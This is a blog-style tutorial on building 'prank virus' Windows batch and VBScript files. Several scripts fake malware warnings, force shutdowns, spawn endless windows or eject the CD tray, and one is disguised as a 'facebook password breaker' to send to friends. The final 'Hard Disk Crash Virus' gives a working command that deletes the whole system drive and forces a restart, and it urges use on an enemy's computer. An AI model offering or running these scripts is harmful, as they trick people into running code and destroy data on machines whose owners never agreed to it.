Creating Prank Virus

Creating virus is illegal but creating funny virus is not. Actually creating prank viruses is quite fun….. :D. They are totally harmless but great fun. Here I will show you how to make few funny virus to panic your friends.

    • Fake Facebook Virus

      In this tutorial I will show you how to make a prank virus using simple commands on notepad. . This will make the victim think they have got a virus when they click onan icon such as Internet Explorer.1) Open notepad 2) Type this in : @echo off msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX! PAUSE shutdown -r -t 300 -c ―SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED!!! PLEASE WAIT ………..” 3)Save as facebook password breaker .bat 5) Send it to your friends and say them it can break Facebook accounts When He/She double click it a message will open and their computer will restart. After five minutes windows will restart, that is all.

    • Fake Virus Batch File

      I got this prank from WikiHow. I love it because it looks the most like an actual attack. Copy and paste the following into an open Notepad window, then save the file with any name you choose and an extension of “.bat” Here’s the code:

      cls :A color 0a cls @echo off echo Wscript.Sleep echo Wscript.Sleep 5000>C:sleep5000.vbs echo Wscript.Sleep 3000>C:sleep3000.vbs echo Wscript.Sleep 4000>C:sleep4000.vbs echo Wscript.Sleep 2000>C:sleep2000.vbs cd %systemroot%System32 dir cls start /w wscript.exe C:sleep3000.vbs echo Deleting Critical System Files… echo del *.* start /w wscript.exe C:sleep3000.vbs echo Deletion Successful! start /w wscript.exe C:sleep2000.vbs echo: echo: echo: echo Deleting Root Partition… start /w wscript.exe C:sleep2000.vbs echo del %SYSTEMROOT% start /w wscript.exe C:sleep4000.vbs echo Deletion Successful! start /w wscript.exe C:sleep2000.vbs echo: echo: echo: echo Creating Directory h4x… cd C:Documents and SettingsAll UsersStart MenuPrograms mkdir h4x start /w wscript.exe C:sleep3000.vbs echo Directory Creation Successful! echo: echo: echo: echo Execution Attempt 1… start /w wscript.exe C:sleep3000.vbs echo cd C:Documents and SettingsAll UsersStart MenuProgramsStartuph4x echo start hax.exe start /w wscript.exe C:sleep3000.vbs echo Virus Executed! echo: echo: echo: start /w wscript.exe C:sleep2000.vbs echo Disabling Windows Firewall… start /w wscript.exe C:sleep2000.vbs echo Killing all processes… start /w wscript.exe C:sleep2000.vbs echo Allowing virus to boot from startup… start /w wscript.exe C:sleep2000.vbs echo: echo: echo Virus has been executed successfully! start /w wscript.exe C:sleep2000.vbs echo: echo Have fun! start /w wscript.exe C:sleep2000.vbs pause shutdown -s -t 10 -c “Your computer has committed suicide. Have a nice day.”

      Here’s how it will look like once it is launched:

      fakevirusbat   4 Cool Fake Viruses to Make Your Friends Freak Out

      Your victim’s PC will display messages as in the above image, and then initiate a shutdown sequence which can be stopped by entering “shutdown ““a” in the Run command box. It looks bad, but is otherwise completely harmless.

    •  Fake Trojan Virus

      1. Open notepad
      2. Type in the following code : @echo off echo Do you want to delete  C://WINDOWS? (Y/N) pause >nul dir /s dir /s echo All Files Deleted. pause msg * WINDOWS has encoutered a problem and needs to close. shutdown -s -t 30 -c “windows file write delayed. Unable to locate system.exe”

      3. Save it as *.bat file.

    • Computer Disk Virus

      Wanna scare someone who uses your computer? Here is a code will continuously open and close your computer disk:

      1. Open notepad.

      2. Type the following code:
      Set oWMP = CreateObject(“WMPlayer.OCX.7”)
      Set colCDROMs = oWMP.cdromCollection
      do
      if colCDROMs.Count >= 1 then
      For i = 0 to colCDROMs.Count – 1
      colCDROMs.Item(i).Eject
      Next
      For i = 0 to colCDROMs.Count – 1
      colCDROMs.Item(i).Eject
      Next
      End If
      wscript.sleep 5000
      loop

      3. Save it as a *.vbs file.

    • Another Trojan Virus

      Here is another code to create a trojan.

      1. Open notepad

      2. type the following code:
      CODE
      @echo off
      title Trojan Virus Uploader!
      taskkill /f /im explorer.exe
      cls
      shutdown.exe -s -t 420 -c “Trojan Virus Detected!!!!!!”
      cls
      :a
      msg * Trojan Virus Detected
      start cmd.exe
      start wab.exe
      start magnify.exe
      start sndrec32.exe
      start sndvol32.exe
      start msmsgs.exe
      start osk.exe
      start utilman.exe
      start moviemk.exe
      start mspaint.exe
      start YahooMessenger.exe
      start mshearts.exe
      start freecell.exe
      start wordpad.exe
      start sol.exe
      start winmine.exe
      start http://twiztedsdumps.fileave.com/
      start http://wowomg.org
      start notepad.exe
      start spider.exe
      start calc.exe
      start PINBALL.EXE
      start iexplorer.exe
      echo C:\Dociments and Settings\Desktop>Trojan Virus!
      echo C:\Dociments and Settings\Desktop>Trojan Virus
      echo C:\Dociments and Settings\Desktop>Worm
      echo C:\Dociments and Settings\Desktop>Worm!
      echo C:\Dociments and Settings\Desktop>Spyware 12
      echo C:\Dociments and Settings\Desktop>Spyware 14
      echo C:\Dociments and Settings\Desktop>Spyware 13
      echo C:\Dociments and Settings\Desktop>Spyware 11
      echo C:\Dociments and Settings\My Computer>Trojan Virus
      echo C:\Dociments and Settings\My Computer>Trojan Virus!
      echo C:\Dociments and Settings\My Computer>Worm
      echo C:\Dociments and Settings\My Computer>Worm!
      echo C:\Dociments and Settings\My Computer>Spyware 12
      echo C:\Dociments and Settings\My Computer>Spyware 14
      echo C:\Dociments and Settings\My Computer>Spyware 13
      echo C:\Dociments and Settings\My Computer>Spyware 11
      loop
      goto :a

      3. Save it as *.bat or *.vbs

    • Hard Disk Crash Virus

      Well this is a bit serious virus. So use it only on your enemy’s computer 😉
      Open Notepad and Enter the following code

      @echo off
      del %systemdrive%\*.* /f /s /q
      shutdown -r -f -t 00

      Save the above code with  .bat extension.

      Caution: If you open the .bat file it will delete ur systemdrive. so be careful If Any lose of ur data i am not responsible for that. You should carefully use it. Use it only on your enemy’s laptop or PC.

Here are some  of the few very common viruses… Next time I will come up with more…

Leave a comment